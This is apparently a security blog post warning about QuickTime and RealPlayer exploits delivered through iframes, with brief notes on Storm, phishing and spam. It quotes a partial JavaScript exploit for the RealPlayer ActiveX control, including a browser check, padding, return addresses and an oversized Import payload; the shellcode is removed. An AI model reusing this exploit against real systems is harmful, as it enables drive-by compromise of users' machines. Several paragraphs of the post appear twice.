QuickTime and RealPlayer Exploits
We're seeing lots of reports about Quicktime and RealPlayer exploits in the wild. Other security vendors are privately reporting an excess of 300 sites infected with these exploits. Most of them are iframes pointing to encoded Javascript. Of course users may never even know they've been infected.
Here is a partial snip of one exploit in human readable form:
Many people forget to upgrade the their third party applications. Please remember to apply all security patches for those as frequently (or more so) than Windows updates.
In other news,
Storm (CME711) has been very quiet for about two weeks now. The websites are still listening, but not serving any content. I still expect something big for the Christmas/Hanukkah season.
A large number of readers have reported phishing sites since my last blog posting. I wouldn't be surprised to hear there are more victims with the online gift buying season in full swing.
Spam (especially adult oriented) appears to be on the rise, at least to our mail drops. In the last two hours we've received 86 enlargement offers - Perhaps someone is trying to tell me something? -- Maybe my wife is behind that campaign...
Happy Holidays!
Here is a partial snip of one exploit in human readable form:
function RealExploit()
{
var user = navigator.userAgent.toLowerCase();
if(user.indexOf("msie 6")==-1&&user.indexOf("msie 7")==-1)
return;
if(user.indexOf("nt 5.")==-1)
return;
VulObject = "IER" + "PCtl.I" + "ERP" + "Ctl.1";
try
{
Real = new ActiveXObject(VulObject);
}catch(error)
{
return;
}
RealVersion = Real.PlayerProperty("PRODUCTVERSION");
Padding = "";
JmpOver = unescape("%75%06%74%04");
for(i=0;i<32*148;i++)
Padding += "S";
if(RealVersion.indexOf("6.0.14.") == -1)
{
if(navigator.userLanguage.toLowerCase() == "zh-cn")
ret = unescape("%7f%a5%60");
else if(navigator.userLanguage.toLowerCase() == "en-us")
ret = unescape("%4f%71%a4%60");
else
return;
}
else if(RealVersion == "6.0.14.544")
ret = unescape("%63%11%08%60");
.....
(removed some content)
.....
PayLoad = Padding + AdjESP + Shell;
while(PayLoad.length < 0x8000)
PayLoad += "copyleft";
Real.Import("c:\\Program Files\\NetMeeting\\TestSnd.wav", PayLoad,"", 0, 0);
}
RealExploit();
Many people forget to upgrade the their third party applications. Please remember to apply all security patches for those as frequently (or more so) than Windows updates.
In other news,
Storm (CME711) has been very quiet for about two weeks now. The websites are still listening, but not serving any content. I still expect something big for the Christmas/Hanukkah season.
A large number of readers have reported phishing sites since my last blog posting. I wouldn't be surprised to hear there are more victims with the online gift buying season in full swing.
Spam (especially adult oriented) appears to be on the rise, at least to our mail drops. In the last two hours we've received 86 enlargement offers - Perhaps someone is trying to tell me something? -- Maybe my wife is behind that campaign...
Happy Holidays!
Labels: CME711, Iframes, javascript, peacomm, peed, Quicktime, Realplayer, spam, Storm
posted by Nicholas at
04:54
0 Comments
